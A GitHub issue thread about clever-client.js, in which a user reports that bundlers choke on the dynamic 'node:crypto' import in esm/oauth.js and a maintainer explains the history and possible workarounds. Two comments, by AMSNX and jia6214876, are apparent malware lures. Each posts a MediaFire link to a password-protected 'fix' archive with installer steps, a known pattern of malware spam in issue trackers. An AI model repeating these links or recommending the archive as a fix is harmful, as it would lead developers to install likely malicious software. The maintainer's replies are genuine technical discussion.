### ISSUE TITLE
provide a esm module compatible with bundlers

### ISSUE THREAD

**Issue by lovasoa** [CleverCloud/clever-client.js#113]
Hi ! 

 There is an issue here:

https://github.com/CleverCloud/clever-client.js/blob/61fc4e691dee9345e61646e9869bf2f29e66ccee/esm/oauth.js#L3-L14

The code tries to be smart, but modern js bundlers will see this code, ignore the if, and try to resolve the `import('node:crypto')`, failing if it's not available. It would be great if we could import  `@clever-cloud/client/esm/oauth-web` and `@clever-cloud/client/esm/oauth-node` separately, in order to avoid bundlers ever seeing node imports.

**Comment by AMSNX** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by hsablonniere** [comment]
Hey @lovasoa,

Thanks for your message ;-)

* We used to have two implementations (browser and Node.js) of the oauth file: https://github.com/CleverCloud/clever-client.js/commit/89cb501fabee530ece877e26f8028bf78558cc3f
* It was a bit cumbersome and with new versions of Node.js, so we decided to "simplify" things and merge into one file.
* The problem as you mentioned it is bundler usage.
  * Technically, they don't ignore the `if`, they work on the AST level and will always try to handle the dynamic import.
  * In our web console, we added a `externals: { 'node:crypto': 'nodeCrypto' }` in our Webpack config but I can understand the situation can/must be improved.
  * In your CF worker, you could fix the situation with a [custom build](https://developers.cloudflare.com/workers/wrangler/custom-builds/) but it's way too much for such a simple situation.
* Also, your comment made me realize that Node.js (like Deno, Bun and other runtimes like CF workers) expose a `crypto` object globally with the Web `subtle` implementation.

Anyway, now that I've explained the historical details, I'll take some time to check that your suggestion works in our console and CLI and prepare a release so we can fix and simplify your situation :wink:

**Comment by hsablonniere** [comment]
OK, I just checked on a Node.js 18 (which the version used by our CLI) and it's not available globally. I think that's why we went for an explicit dynamic import.

We're currently reworking lots of things in our CLI (to be able to migrate to v22 and many other nice things). Once we have that, we will be able to rely on `crypto` being global. This will happen in the next few weeks but I can imagine you'd like a solution before that.

Is it OK for you to have a patched copy of `esm/oauth.js` while we wait to settle things?
